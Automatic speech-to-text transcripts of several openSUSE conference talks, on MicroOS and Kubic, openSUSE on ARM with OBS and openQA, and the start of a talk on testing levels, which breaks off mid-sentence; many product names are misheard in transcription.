VMs, cluster nodes, hardware appliances, Raspberry Pi, IoT. The idea with it, if you're running it in a container or you're just putting an extra RPM package on top, MicroRS should be the perfect open-sousa for that kind of use. In my case, I've become a complete MicroRS addict. So, I'm obviously chairman of OpenSousa, I've been using Leap, I've been using Tumbleweed. At the moment right now, I have one Leap machine left. Everything else in my life is either pure Tumbleweed or MicroRS, including all of my personal infrastructure. So, I have an XCloud server that's running on MicroRS as a container host using the next cloud container. There's my blog, in fact, there's my blog, there's a Cubic blog, there's pretty much every blog that I'm involved in somewhere that's running on MicroRS, running Jekyll on top. In those cases, I'm not using a container, I'm just using plain Jekyll RPM packages and running that one service there to deploy the website. I have a retro gaming machine that's plugged into the back of my TV using a combination of MicroRS with RetroArch and Emulation Station. That's been plugged into the back of my TV now for about a better part of a year and a half, and I haven't actually looked at the console for that for that whole time. It's just been plugged into the back, it's been updating Tumbleweed every single time, rebooting itself in the middle of the night, and whenever I feel like playing old retro games, I just flick to that on my TV and it's there and it's working, and it's running the latest version of Emulation Station based on what we have on OBS, and it's never gone wrong. I didn't bring it with me today, I might bring it with me tomorrow. I take it to conferences, we shove it on the booth when everybody's bored and play a few games, and it's never gone wrong. Every time it boots up, it's there, working fine, and I assume at some point Tumbleweed has had a bad day, but it automatically rolled back, so as a dumb user, I don't notice. It's just there, always working with the newest stuff. My Minecraft server, which me and my friends are used to, same again there. Another micro-S machine, in this case, I think, I'm running it on Hexner, so running it in the cloud, and that's just running a container on top of it, and it keeps on patching itself, and I don't pay any attention to it, it's just there and working. So after I'm done rambling on about this stuff, Ishi is talking about how he's using micro-S in production at 4.15 in here, and in fact if you want to hear me ramblawn about this stuff a bit more, I have a crazy idea about using micro-S as a desktop. I messed around with this a past in a Hack Week project, and I'll be talking about it more at 3 o'clock in here as well. If you're interested in playing with this, it's part of Tumbleweed. Download the openSuser.org slash Tumbleweed in the appliances folder, in the ISO folder, you can download this now. We don't have a website for micro-S yet. Volunteers are welcome, please. It's all new, we're moving stuff around, so if you're interested in working on a website for that, please find me around the conference. Let's talk. We need to obviously start spreading this, and just having ISOs sitting on a download server isn't going to get everybody using it, but at least technically speaking we can say it works, it's awesome, we're building it, we're testing it, it's good quality. Now we just need to spread it around the whole world. So that's micro-S. What about cubic? With micro-S now defined as this general purpose, single purpose operating system, so you can use it for anything, but we expect it to be deployed for just one thing at a time. Cubic is now a micro-S derivative. Basically it's a showcase of what you can do with micro-S when it comes to containers or Kubernetes. So we're still using the name Cubic because people know it, and it's part of the Kubernetes ecosystem, it's known by the cloud-native compute foundation and the like, but from a technical perspective it's just a micro-S variant, and just like micro-S it's built as part of tumbleweed, tested as part of tumbleweed, shipped as part of tumbleweed, and so yeah, all works as part of that family. We have three distributions all on one code base now. Containers in particular are fun. They do a really good job of trying to solve that kind of problem pooling problem. Problem pooling problem? Well, should have thought about that. And by separating the service or the application from the operating system. And I've realized more and more, as a distro engineer, as a Linux geek, I don't necessarily care about that because I'm a kind of user that, I'm perfectly happy doing everything in RPMs because I care about the base system and I care about the application, I worry about all this stuff. But most users don't. They don't want to worry about the operating system, they just want to worry about that one thing that they care about, their web server, their Minecraft server, whatever. And containers give a really nice model of reflecting that technically speaking. The developer, the user can just worry about that service they want to deploy. And they can micromanish that. They can really take care about what's in that container, where they pull that container, how they configure it. And that's the bit of the story they want to worry about and they just want something underneath that they can just leave and forget about and not do anything with. But now we have micro-S. And like my examples, I've just deployed it and I don't look at it anymore, it takes care of itself, it patched itself. So marrying these two things together works really, really nicely. But you need to, of course, have something to run those containers inside. So we're huge fans of Podman in the Cubic project. Podman is an alternative to that other container runtime, beginning with D that people like. One of the reasons Podman is a really interesting project is from an architectural perspective, it's more interesting. It doesn't have a single demon, so with Docker, there's this one big Docker demon which is a nightmare to secure, it's a nightmare to manage, and if that Docker demon dies, all of your containers become impossible to manage. With Podman, it's acting actually like an old-fashioned UNIX application, in the sense of it starts a container, as a process, you can manage the process, you can stop the process, and yeah, there's no demon to die, you can still manage it if things go a little bit weird. And it supports all of the same containers that Docker does, and in fact it uses all the same commands that Docker does and some fun extra ones as well. So basically for a lot of people, if you want to transition from Docker to Podman, just alias Docker to Podman, and the commands will mostly work the same. In the case of Cubic, we don't install Docker by default anymore, in fact I don't offer Docker anywhere in the installation options anymore, so you're going to get Podman by default. If you don't like that, you can install Docker from Cubic, from Tumbleweed, it'll work as well, but yeah, please, if you're interested in containers at all, try it, play with it, it's awesome. When I wrote this slide, I forgot that Fabian was going before me, but yes, we have registry.openSuzi.org now. It's building containers directly from OBS. It's rebuilding those containers as part of OBS rebuilding the packages, so the containers are always fresh, they're signed, they're notarised, and with Podman it's nice and simple, you can just run a single command, download the latest official Tumbleweed Leap container, and the more containers there's people, the more people we add it. If you want to know more about that, and you weren't here half an hour ago, just watch the video, because Fabian did a really good job of explaining how we can build those containers and how you can contribute to that. Who here has heard the word Kubernetes before? Cool. Kubernetes is special, containers running them at scale, and when I say special, I mean it in the positive and the negative way of special. It's designed to run hundreds of containers across dozens of machines, and when you look at that from a distro engineer's perspective, it's an absolute nightmare. Like Dr T talking about Caspin Cubic this morning, part of the reason why things have gone a little awry there is there are just an infinite amount of moving parts. No matter which way of the stack you look at it, from the user's point of view, they always want to have the latest containers. You have the containers always moving really quickly, and then of course the latest containers probably require the latest Kubernetes, so they just need to have Kubernetes moving really quickly. That of course then has an impact on your container runtime if you're using CRIO or Docker, and therefore that needs to move really quickly. That of course means the base operating system has to move really quickly, and somehow all these different parts all have to move really, really quickly, and at the same time actually work. It's the problems we were talking about earlier, configuration management, patching, hardware, just kind of amped up to 11 and then some. But with Cubic, because it's based on microS, because it's adopting this principle of single purpose operating systems, it's basically in my mind the perfect Kubernetes operating system, because the tumble we base, the moving quickly part, is totally solved. We can move as fast as all of the upstreams without worrying about things much at all. It means we can also integrate the latest stuff from upstream right away, so Cubadm. In Cubic, for Kubernetes, we don't use Podman, because Podman is kind of more designed for your single host. Instead, we're using CRIO, which is basically the same thing, but optimized for Kubernetes, rather than a single host. Coming soon, in fact, technically, oh, I just realised why Merita was pointing slightly. There we go. Cubic, everything I was just saying. Coming soon, we have Cured, which is a service running on your Kubernetes cluster to help orchestrate the rebooting aspect of patching Cubic systems. Because we have Cubic where it patches itself, and then it needs a reboot for the patching to take effect, and with Kubernetes, you have a large cluster with hundreds of different machines, all doing different things, you don't necessarily want to have those machines randomly rebooting when it's really inappropriate, when it's busy. With Cured, you have a service sitting on Kubernetes, it's aware of what your cluster is doing, Cured stands for Kubernetes reboot daemon, by the way. Cured is now integrated with Transactional Update, so it can be aware. These machines are ready for a reboot, and then they'll trigger the reboot when the time is appropriate. We also have a new tool called Cubic Control, which helps streamline and bootstrap the whole Cubic Kubernetes story. We're using Cubic to actually start the cluster, build the cluster, but with Cubic Control, we wrap that around, help set up a salt master and configure salt all at the same time. Unfortunately, I don't have time to talk about that today. Setting up a Kubernetes cluster on Cubic is incredibly easy. The documentation is on the wiki. We need to have at least two machines. You set up the installer at the moment using Yast, or you can use the images we're working on. Basically, installs it. SSH is automatically configured. In addition to SSH, we also have this really cool tool called TALO, which sets up basically like fail to ban. TALO is listening to your system D journal, figuring out who's trying to access your SSH connections, and if it's getting too many failed attempts to guess the root password, it just blocks them, sets up the IP table rules, and it's nice and secure. Another one of those nice things with Cubic is that you don't have to worry about configuring it much after the deployment. It's already there, already taking care of itself. Once you've got your first Cubic node installed, all it takes to set up that node in the cluster is one command. If you've seen previous versions of the slide, that command used to be really long. Thanks to working with upstream, we've managed to solve most of the issues, just one command and a string for setting up the network. In fact, the talk tomorrow about Selium, actually there's an alternative way of doing this to use what you will learn about Selium tomorrow. When that's finished, Cubadm gives you a nice command, which is way too small to read here. Basically, that's the command you need to run on the other nodes on your cluster. It will join the cluster, automatically have its keys configured and trust established between the other nodes in the cluster and the master that you just configured. Then you need to configure a client so you can manage the system. That's nice and easy because Cubadm has already made the config files for that, so you basically just copy the config files to the right location. You need to have a network, again, nice and easy because we're in this wonderful container world, so a single command there, that will deploy your container cluster to your container network to your cluster. After those few commands you're done, all of you just add all the additional nodes using that command you were given at the beginning, and you end up with a Kubernetes cluster. You can then start deploying your containers, have the containers automatically moving around multiple machines, taking care of themselves, and that combination being, therefore, then, Cubics underneath, patching itself, rebooting itself, the containers on top moving around the cluster, so everything is always working all the time. To know more about Cubic, because there's just so many talks about all this stuff and I didn't have to fit it all in here, Dennis is talking here today about using Cubic with Ceph and with Rook. Just before five o'clock, and then after him, we got to talk about Cubic and open SDS as well. With that, I'm done with ten minutes left for questions, so does anybody have any? If you do, I think I have the speaking microphone, so I'm afraid you're going to have to go at the back, because I broke the other microphone. Hello, Joe. Hi. So you've really advertised using Micro-Ware. Are there any reasons not to use it? I mean, it looks like why wouldn't we just change everything to Micro-Ware? Why isn't it the perfect solution for everyone? So, if the deployment of the machine, the VM or whatever, is just going to do one job, I think it might be the perfect answer for everything. That's what I want to explore a little more in my talk an hour from now. I'm not quite sure on that, but if you're the kind of person that wants to tinker around with the machine once it's deployed, like, let's say, for example, me as a typical tumbleweed user where I'm installing packages and removing packages and really messing around with the innards of the system, Micro-Ware is not a friendly system for that, and it's going to be rebooting every time you're making a change to that part of the operating system. So, tinkering and playing around is your thing. Micro-Ware isn't the best for that, but if it's more of a case of you want to deploy it, have it just do one job, and once it's deployed, pretty much forget about it, I really think there's a place to use Micro-Ware in tons of places. Yes. What I'm hearing from some users is that the reboots are just too frequent, because every update has to go through the reboot. Would there be a way of doing it, like, in two worlds? If you have updates that are safe to apply, like non-kernel updates, so we could still do that, and then kind of make the file system read only, and do the copy only if you have to do, like, the big ones every three months, where you do the kernel updates that major security updates that don't need a reboot. Would you like the answer that Susan management would probably like me to say, or my personal answer? Personal one of them. I don't trust maintenance updates. They have a habit of breaking more than tumbleweed updates do, partly because there's a legitimate technical reason for that. It's incredibly hard when you're just trying to change that one thing in a complex system, that kind of desire to minimise the change brings with it certain risks that in tumbleweed we just managed to blast right past, because we can change everything. We can always, if that one tiny change needs us to change 20 libraries, we change those 20 libraries, we test everything, we ship everything. The micro-S patching model is kind of a reflection of that philosophy. Maybe there is room for a hybrid. If there is, I'm not probably the best person to find it, because I'm very much on the rolling everything side of things. Good? Okay, so by the way, I'm running my laptop on tumbleweed, so I know what you're talking about. Yeah. When you say doing one thing, what do you mean in so much as would something like OBS classes doing one thing, or is that which part of OBS are you talking about, workers, et cetera? Yeah, it's a bit of a nebulous term, kind of on purpose, because that kind of scope of one thing can vary around. So, the typical kind of one thing would be like a container host. So, in that case, it's micro-S plus podman. That's the scope of micro-S. The one thing is podman. The fact is podman might be running 20 different things in a container. That's out of scope of the operating system. We're not going to reboot because you deployed in your container. The system state is changing because podman is getting an update. So, with micro-S, there's nothing stopping somebody installing micro-S today doing transactional update PKG in 20 different packages, turning all of them on, and having those 20 things be the one thing for micro-S. You bring with that more of, like Joe mentioned, the patching problem. The more things you deploy there, the more things are going to move, the more things you're going to need to reboot because... If you try to make this one machine do everything, you kind of lose the benefit of micro-S being this kind of just simple deploy, forget about it option. So, there's a balancing act in between. With something like OBS, I think OBS is smartly designed enough that in fact many of those parts are kind of already built in that way. Like the workers, workers would probably make perfectly good micro-S use cases because you deploy micro-S, you have the worker software on there, and then everything else is VMs for the build part. So, that would work. I'm talking later about the micro-S desktop. A desktop is kind of stretching the one thing a little bit. But that's where I want to be exploring with that. Thanks. I want to be exploring that of, you know, does it make sense to install Wayland and X and Nome and kind of define that as the one thing and see where that goes. So, I don't want to strictly define it down to like, oh, it has to be one package or whatever. It's open-susa. We want to figure out where that line perfectly is. But I would, if someone's going to file a bug on micro-S and say, I installed these 20 things and one of them doesn't work, I'm probably not going to be, you know, that, I'm going to suggest they're going to use something else other than micro-S. Any more questions? Yep, cool. I have one question about a file system because I think now you can kind of create a snapshot for the system and rollback to previous version. But still the file system sometimes may kind of broke or it's just filled up and you cannot write anything into the disk. Do micro-S have something to solve the problem that the file system itself may fail and we can kind of recover it? So, but BOTRFS has a bit of a reputation for being a bit of a hard beast to live with. In my opinion, it's actually mostly an unfair reputation. And I'll try and answer your question in both parts. In terms of the case of BOTRFS filling up because of snapshots, which is something in OpenSuser we've had a ton of, and part of that is at least partially my fault, there is a balancing act of making sure that the root file system is big enough for the snapshots caused by the root file system changing. Until recently, I don't think we got that balance right. In currently in Leap15.1, in micro-S, in tumbleweed, I really strongly believe we've solved that problem now because I've spent a really hard time trying to get the LibStorageNG sizing rules for all of those things to be far more accurate for the real world. So we generally have YAST automatically making the root file system bigger. So it has more space for those snapshots. Plus, Arvin on the YAST team has done a lot of work with Snapper, so it tidies up itself better. So those two things together mean Snapper shouldn't be filling up the disk anymore. Full stop. That should be fixed. The other part of the reputation of BTFS being a bit fragile, I talked about actually at OSC last year. There's a lightning talk I did on it. The biggest problem with BOTRFS is it's aware of what's going on with the disk. It's smart. It's got its data. It's got its metadata. It's constantly checking that those things are in sync. When something goes wrong, it takes the action of mounting everything as read only. So people think it's broken. It's not broken. It's just taking care of itself. Unfortunately, when that happens, most people have used something like EXT4, and what's the first thing we all do when EXT4 is misbehaving, we run FSCheck. If you run FSCheck on BTFS, especially with minus, minus repair, you're probably going to break BTFS. It's why the documentation says this is the last thing you should ever do. But nobody reads the documentation. On the wiki for OpenSuser, we have a 14-step guide on basically what to do when BTFS misbehaves. For 99.9% of people, you don't get past step 4 before it's fixed. Actually, running FSCheck is the last step. When you do the right things with butter FS, it's perfectly reliable. Sousa are using it in the enterprise. Read the manual, read the wiki, and don't panic when something goes wrong. I've never had a BTFS system in the last four years. I haven't been able to fix. I've had a lot of broken systems. Thanks. Cool. Good. I think I'm out of time. Thank you very much.
As the world moves more and more towards containerised solutions, a number of real questions start to appear. - What is the perfect platform for running containers atop? - How to use this platform as part of a flexible, scalable, highly available infrastructure fabric? - How to minimize the maintenance and administration of this platform at scale? Many of these problems are well answered in enterprise container offerings, but for developers more interested in the state of containers & kubernetes upstream, new issues start to appear. With such fast moving upstreams, developers and enthusiasts need a platform that can keep up and is closely involved with those upstream developments. This platform needs to not only be able to run containers at scale, but also on single machine, all the while preserving the attributes of low maintenance so the focus can be on the containers, not the base system beneath them. And then the question becomes "What is so special about containers anyway?" - in more and more cases, people are deploying Linux VMs, Cloud instances, or bare metal to do 'just one job', with other jobs being handled by other machines. Can we simplify the Operating System and make it easier to live with if we optimise it for these 'single-purpose' deployments? This talk introduces openSUSE MicroOS, and explains how it addresses the above, being the perfect distribution for this modern age. The session will explore in some detail how MicroOS is developed in lockstep with the Tumbleweed rolling release and can be used for a wide variety of single-purpose systems. This talk will also discuss openSUSE Kubic, the MicroOS variant focused on containers. The talk will share how Kubic collaborates with various upstreams including kubeadm and CRI-O. Transactional Updates, Kubic's system update stack will be demonstrated and the benefits from such an atomic update approach discussed in some detail. Finally the kubictl Kubernetes cluster boostrapping tool will be discussed and some future plans shared for consideration and feedback.
10.5446/54420 (DOI)
I'm Guillaume Garday. I work for ARM as partner engineer, dedicated to SUSE and Open SUSE. I will cover what happened since about a year on Open SUSE side for ARM. I will start with what is Open SUSE on ARM. Then I will give another view of Open SUSE on ARM workflow of the development. And we will see what happened on OBS side, on Open QA side, and specifically on Tom Bellwine, Cubic, Leap. A little word about Open SUSE Wiki and finally the to-do list. And we will have some time for Christians at the end of the talk. So what is Open SUSE on ARM? The short answer is obviously Open SUSE running on ARM architectures. What does it mean? We support 32-bit ARM architectures, ARM V6 for Tom Bellwine only. We also support ARM V7 on Tom Bellwine and Leap. And also 64-bit architectures on both Tom Bellwine and Leap. ARM systems are very wide. We cover very small embedded systems such as Raspberry Pi. But we also have some very powerful server systems such as the Sundex 2 from early Cavium, now Marvel. And there is some differences between those systems. On embedded world we are more with custom bootloaders, which is a bit painful sometimes. And on the server side we use UEFI, so we have a single image and you can run it on your server. Before talking about Open SUSE on ARM workflow, a little word about Open SUSE workflow on X86. For Tom Bellwine, when we want to update some packages, you submit it to factory. It is reviewed, it is tested. And once accepted to factory, it is pushed to Open QA for further tests. And if it's okay, the update is released to users on download server as Tom Bellwine. For the ARM side, we have Open SUSE factory ARM project, which is simply a link to Open SUSE factory X86. The same for LIP. We have a project link from Open SUSE LIP 15.1 ARM to the X86 project, which is Open SUSE LIP 15.1. And so we reuse all the sources. It's really the same. No patches on top. It's updating in real time. So when you have an update on X86 factory, you get the update on ARM side. And there is just a very small overlay, which is available to handle the snapshot version, the content of ISO and FTP trees on the ARM side. Here you have a screenshot of the Open SUSE LIP project. So you can see that we have only four packages for the overlay. And all the rest are inherited packages from the X86 project. So if you want to get an update on ARM side, you have to push it on the X86 side, because we share the sources. So the workflow is the following. You submit it to factory as previously. It's reviewed. It's a little bit tested. And then when it's reached factory, it is inherited in factory ARM. And then it is pushed to Open QA ARM. And if it all is OK, it is really a tumble with ARM. If the Open QA is not OK, the update is blocked so that users are always fine. Now let's talk about the OBS. In OBS, we get some servers to get more power to build packages for ARM. So thanks to our sponsor, Marvel, formerly Cavium, which gives Thunder X2 machine. Those build powers allow to remove snapshooting between X86 factory project and ARM project. So now the sources are updated in real time. Previously, we needed to block the updates because it was very too fast. And then tumble with didn't have any time to rebuild and push to Open QA. So now it's OK. It allows to enable more ARM builds in deval projects so that maintainers can see build failures on ARM earlier and they can fix it when they care. Here is a little word about how to enable ARM build in your project so it can be your own project or deval project. It's the same process. You just go to the Reparizatories tab and then click on Add Reparizatories. Then on the second page, you just select the ARM distribution you want to build for. For example, OpenSuser LIP 15.1 ARM or OpenSuser Factory ARM. Previously, it was OpenSuser LIP 15.0 PROTS because ARM and PowerPC was part of the same OBS project. So maintainers, please enable it and catch build failures for ARM early. ARM containers are now published when ARM is released, not when X86 is released. It seems obvious that it was not the case previously. Some ARM OBS workers have been updated to better fit requirements of packages. In fact, we decreased the number of build workers but increased CPUs, RAM available. On OpenQA side, how many people knows OpenQA here? Do you know how it works? Not so much. So a little bit about how it works. You have one server, a chart for all architectures where you have a web interface and an API. This server, all the files, I mean ISO, hard disk images, repositories to test, it has also the test suite information and then it controls the test run and stores the test results. Connected to this server, you have a number of machines which can be X86, PowerPC, ARM, whatever. And on this machine, you are running some virtual machine. Here it's KMU and you run tests inside it. And for each test, you run some actions and check if the result is expected or not. If you want a very complex schematic, you can read this. Just go to open.qa.com or ask OpenQA guys here. Just a very small example. This is the major check test. It just puts the ISO, start to check installation media and make sure no error are found. So you can see screenshots and the screenshots are used to check if the test is okay or not. On ARM side, we just test ARMv8, so the 64 bits flavor. Currently, we do not test for ARMv6 or ARMv7. Last year, we used Seattle machine, which was 6 CPU with 32 gig of RAM and we only run two workers on it. We did a few tests for tumbleweed and lip, but with two workers, you are very limited if you want not so long testing OpenQA. Then at the end of the year, we get a new machine, a D05, which was very powerful with 64 CPU, 128 gig of RAM, a big SATA disk. Initially, we enabled 10 workers on it and now we are at 16 workers. So we added even more tests for tumbleweed and lip. And we now have a very good coverage of OpenQA on ARM. We test, for example, upgrades, but if it's tools, virtualization, read, multipass, et cetera. Of course, we needed to update some tests for ARM because sometimes only X86 is supported in the tests, so you need to update. We got non-arm-specific updates, which include a new test added, of course. OpenQA has now a good developer mode, which allows you to stop the virtual machine, take a screenshot, save it, and so on. There is a good script to use when you make a pull request on the GitHub to update tests or add new tests. And with this script, you can run the tests on OpenQA.OpenSuser.org and show that it's okay. We added support for huge pages with KMU backend and also generic options to be passed to KMU. A few numbers. From one or two weeks ago, on tumbleweed, we have 72 tests now, plus 69 tests for the kernel. And on lip, we have 59 tests. On tumbleweed, there is eight tests for cubic micro-race. You don't have it on lip, of course, because cubic and micro-race is a tumbleweed flavor. On the DVD, you have three more tests on tumbleweed side because LXD is only available on tumbleweed DVD, so you can test it only on tumbleweed. And there is just two more tests added recently. OpenQA, bootstrap, and OpenScap. On the net ISO, we have two more tests on tumbleweed side, too, because we create an hard disk image with a release tumbleweed and test the upgrade from this hard disk image to the tested image. And we also test, we have two tests suite for just in-house RS. A few screenshots from two days ago. So you can see that tumbleweed arm is not so bad. Lip 15 has been released, and it was in pretty good shapes. The six failure arm, not all real failures, you are false positive, and only one real bug. And on just in-house RS images, it's not so good. But it's not very big things. In fact, when you run a very long test run, a single test failure makes it all red. Now let's talk about tumbleweed. Tumbleweed is now officially supported and is no more best-effort port for ARM. I mean for AR64, it's not the case for ARMV6 or ARMV7. Lots of package have been fixed on build time, on OBS, but also on run time on OpenQA. It includes kernel, Firefox, Chromium, and more. We also added new packages or enabled build for ARM64 bit. It includes LDC compiler, Free Pascal compiler, and more. And we also added some features to existing packages. For example, in Mesa, where we enabled some ARM specific options. On ARMV7, we enabled two more boards on EFI Grub 2 support. It's Saberite and Chromebook Snow. And we get some boards out of Contrib projects and are now in the upstream factory ARM project, such as Udo Neo. And thanks to the always up-to-date kernel in tumbleweed, we get all the improvements we get in kernel upstream. ARM AR64 supports also Qubic since January this year. It is tested in OpenQA with tumbleweed. If you want to get more information on it, I added the link on the slide. I'll just go to Qubic.opensooser.org and you will find it. On lib15.1, just a little word about how it is built. In fact, lib15.1 inherits some packages from Sleep15.sp1. It's for core packages such as GCC, kernel, and for the rest, it inherits from lib15.0. And if package maintainers want to, they can push updates from tumbleweed. So this is the case, for example, for Carita or Firefox. And we, of course, fixed some packages built and runtime failure. As for tumbleweed, we switched to both from ARM v7 family. It's again, satellite and Chromebox. Now, they're ready to use images such as Justine OSTOS or Docker. It was not the case before. And we released always up to date images from lib15.1 project. Yep. A little word about Opensooser Wiki. The main page for ARM is portal ARM. On this Wiki, you can find some updates such as on portal ARM, of course, but also on hardware compatibility pages. We added some, for example, the D05, the overdrive 1000. And there is an interesting page with tests on systems, which is Opensooser supported ARM boards, where you can find if USB or video output is supported and working with tumbleweed or lib. So if you have a board, please add it. And if you want to get information, go to this page. So a lot have been done, but still along to the list. We should continue to improve the Wiki with new information and up to date information. We can improve on OBS side. What we need to do is to speed up ARMv7 images because this is a current bottleneck to get more tumbleweed snapshots. I think we have about 100 ARMv7 images to build each type. And we should enable ARM build in more deval projects so that people, so that maintainers can catch build failures and fix it early. Otherwise you have to wait until updates reach tumbleweed and someone notize its failure and the fix is much longer this way. We can improve on OpenQA side. Maybe add more tests for AR64. Why not testing ARMv7 images? OpenQA allow test on real hardware. So why not test Raspberry Pi 3, for example? We can increase the number of OpenQA workers to speed up tests. Maybe. And we should monitor continuously build failures and test failures and fix them as soon as possible. And people, please report the bug you have because I often meet people who told me, hey, I have this problem on this board. Okay. Did you feel the bug or something? Oh, no. So please do it. We need some help to test and get feedback on systems people use. It could be a simple board on the embedded side or a big server and told us what is okay, what is broken and we may fix it. We can add new features such as secure boots, for example. And we need to improve the graphic stack on ARM. So it includes PCI express card such as NVIDIA, AMD, but also integrated system chip into the system chip such as NVIDIA, Adreno, or Mali. And stay tuned on tumbleweed because kernel 5.2 and Mesa 19.1 are coming rather soon. And it adds Mali GPU upstream support. So it's currently just an initial support so don't expect a full open CL or Vulkan or whatever. But most part of open GL ES2.0 is supported. So let's see how it goes. And please join us on IRC or on the mailing list and have fun. Do you have any questions? Yep. Do you have a microphone behind please? Hi. My question is you said on ARMv7 we don't have open QA at the moment. So is this a problem of human resources to enable and look after them or is it a problem of hardware? It's a problem of nobody take care to do it. So we have two options. Either add an ARMv7 board such as an ARM delboard for example and run workers on it. Otherwise you can run workers on 64-bit machine with KMU. Just specify that you want to use 32-bit instruction. But I think we will do it shortly. Hi. The question about testing, you mentioned about Raspberry Pi. So does it work? So how does it work for open QA with actual hardware? Which part of the hardware? With actual hardware, not virtual machine. You mean testing the real hardware inside open QA? You mentioned that in the last slide. It is already done in SUSE open QA. So it works. You just need to add it to open SUSE open QA. So it's just a matter of hardware. All the software is ready to support it. So that means that it doesn't test any specific Raspberry Pi so hardware features? Or what kind of things are tested on Raspberry Pi? I'm not sure if you should ask the people to know what they test. But I think you just run the same test as in KMU. You run it on the Raspberry Pi. Thank you. Any more questions? Okay. Thanks.
This talk will give an overview of what happens since about a year for openSUSE on ARM. What is the current status and what is on the TODO list.
10.5446/54421 (DOI)
So, my presentation will be about open-sousa testing and I'm trying to give an overview. So, for this, let me check one thing first. I have to test something. The scope should be to answer the question, how is software within the open-sousa ecosystem tested? What kind of tests exist? Who is doing what? How is it done? And then I would like to come to some challenges in the end. I will try to use that illustration of the so-called test automation pyramid to guide through this. So, we will go through this from the bottom to the top. It starts with upstream source report tests. Wherever all the software that we are talking about lives, this is where we start with. And then we come to package and project tests. So, this means for all the tens of thousands of packages that we have in the distributions where we can also conduct tests. System level tests. And this is where the pyramid gets more narrow so we can say that we have, by definition, we have less tests where we combine all of that, but they have a broader impact on the whole system, the whole operating system. And then they are acceptance tests. And also on the top of the automation pyramid, this means talking about automated tests, this is now where we reach this cloudy area of exploratory beta testing. So, something that by definition cannot be running in automated tests. But let's start from the bottom for the upstream source report tests. This is, well, something that everyone should do, right? Everyone that is doing software. We have some source code repository. And there, what we commonly see, you can see something like on GitHub, some projects where we have these nice patches and we have a green or red showing how this unit tests are running. Top right, that's a screenshot from Travis where we see checks that we even can conduct on pull requests before merging something. And all this upstream source report tests, they provide a baseline for all the downstream tests, all the tests that come later. This is where we start with. Normally it's hard to cover distribution integration when we are talking about source code repost, this is something like on GitHub or other version control systems where we do not yet talk about Linux distribution mainly, but something about how does my software work in whatever environment I'm using for development. Now, who is doing that? Well, this is the upstream communities that could be single persons that could be bigger communities that have maybe selected some kind of target operating system as their main target. It could be also SUSE or open SUSE developers that develop software in that stage. And how that is done, there's very much ecosystem dependent. So, for example, when your program is mainly in Python, then you're using something like Python unit test or PyTest. If it's in Ruby, then there are certain frameworks where you say like the state of industry which we select. And this defines mainly how you run these tests on that level. Well, why this is done? This is the way to get the fastest feedback because we are talking about developers that on their machine run some code, then want to test does it work what I want to do here. So, it's something that should be available to the developers with the fastest feedback as possible, meaning no, not too many steps in between. It's independent of distribution. Well, I would say kinder because commonly you need to select something as your operating system on which you develop and based on that, you're running the certain tests. For example, if I run open SUSE leap 15.1, then I develop on that. The question is does it still work on open SUSE leap 42.3, which is still supported. So, just some question that is yet to be answered and probably not on that level. So, it can be simple. It could be like Python, PyTest, and TOX. Or it can be more sophisticated. This is showing an example from the Travis test results on OpenQA itself, the OpenQA software, where we have some unit tests, we have some web-based UI tests. So, we are checking the UI, which is mainly the web interface for OpenQA, so we do that. For that, we are using containers. We are using virtual machine something which you might have heard about in other talks. And it's also be used for automated administration. What you can see there in the bottom left is there are multiple checkmarks. Each checkmark stands for a certain set of tests. There are some unit tests, there are some integration tests, there are some UI tests, but there are also jobs which, for example, published the documentation which is generated from the source code repositories. So, something which you can also use, which you can use Travis for or CI systems. Okay. So, this is the level for source code repositories. The next level, when we are talking about OpenSUSE as a distribution, is where we come to the packages. That's mainly means in OBS, we have packages where we get the source code from the upstream source code repositories. And I would call that the foundation of distribution building because we want to have a package for everything that ends up in the distribution. Of course, there are also other possibilities. It doesn't necessarily have to be standard RPM build package where you end up with a binary package. It could also be container itself, a flatback image. Or just an archive of something which you don't even need to build further. Now, I would call the building process also a test. So, you are on OBS that makes it pretty easy. You build against multiple projects, against multiple products in various versions and also various architectures. And by that, you're testing, can I build that package? It might fail because of missing dependencies, something which is not necessarily something that you need to change in your own source code. It might also be that you're relying on certain features which is only available in certain versions of dependencies or base layers which is maybe not provided on older version or maybe a more recent version already behaves different. And if you are talking about packaging, then commonly this is done using RPM based on spec files. And in spec files, there is building rule, there's a rule for preparation. There's also one rule which you can use which is called percentage check. And if you use that, then you can run the tests that maybe you have already run on the source code repository level. You can also do that within OBS. And the advantage is that you do that for all the different combinations which I've mentioned earlier. Now, I would like to present one slightly alternative approach on top which is what I would call the multi-built package self-test. The question is what if the upstream tests are passing but your package is broken? Or what if because this had been also mentioned multiple times in different talks and I will come to that, what is OpenQA. But what if OpenQA system tests are too late or too broad because all the other tests they come later, they take longer, it takes longer for us to get the information. And as an example project which for now I will not show on OBS. But what it does is in OBS projects it uses two files. So what you need is two files to define that you want to run second to the building step of building a package. You want to run some tests which are in another environment, not the build environment, but another dedicated independent environment where you can test does my package actually install. How does it work if I call a very trivial example, my script minus, minus help or something. There are two files, underscore multi-built, there you can define a variant. So you are defining next to the normal variant of your package the test variant. And then there is another one which is in the spec file itself. So there you can see the name colon and then the definitions. This is what you commonly do when you build a package. The special part is something with this if test and something. So let's talk about this block here. What you do here in a test environment, the package, the test package requires on the build package. By doing that, when you kind of build this test package, you are trying to resolve all the dependencies. But you are trying to resolve the run time dependencies which you would need. If you would conduct only a test within the build environment, you would not check for the run time dependencies but only for build time dependencies. This single line already can show you what you might be missing regarding the run time dependencies which you forgot to mention in the spec file. And the second part, later down here, so this is an example from a server application. And what you are doing here is you are calling the commands which you would install by your package which you are building. And by doing that, of course, within the limits of the environment, in case of OBS, for example, there is no external network access. But still, you can run a local host server and try to register against that server locally. That all happens within OBS. And if you have seen OBS build results already before, this is resembling the same. It's just that you have a second half to it. So normally, you have a package. I assume many people have seen a view similar to that. You have multiple repositories. You have multiple variants for the different architectures. And you see that all the packages succeed to build. That means we have a package for all of these projects. However, the test package, which is this multi-build variant which I showed you before, shows that there are some problems. For example, on leap 42.3, it shows unresolvable. Now, what does that mean? It means that we could build a package. We could find all the dependencies that we need to build the package. This is why it succeeded to build. But afterwards, when checking for the run time dependencies, we can see that leap 42.3 doesn't offer all the dependencies which we would need. This is why I have put in another variant of the repository, which is the last line, where I'm adding an additional repository. I'm saying, okay, then if that dependency is not there, let's try to add another development project which should provide the dependent package. And then you see that it can install the package, but then it fails. So in the later step, when I was trying to register again my own server, I can see, like, aha, this doesn't work. Something is about the versions of the dependencies which is now different. Now, that adds quite some boiler plate code in the spec file. It's not actually nice or tidy because it's kind of abusing this instrument to build packages for testing. There's only one suggestion which I can give is to use a separate spec file which you can also do. So if you don't want to intermangle these all, you can have 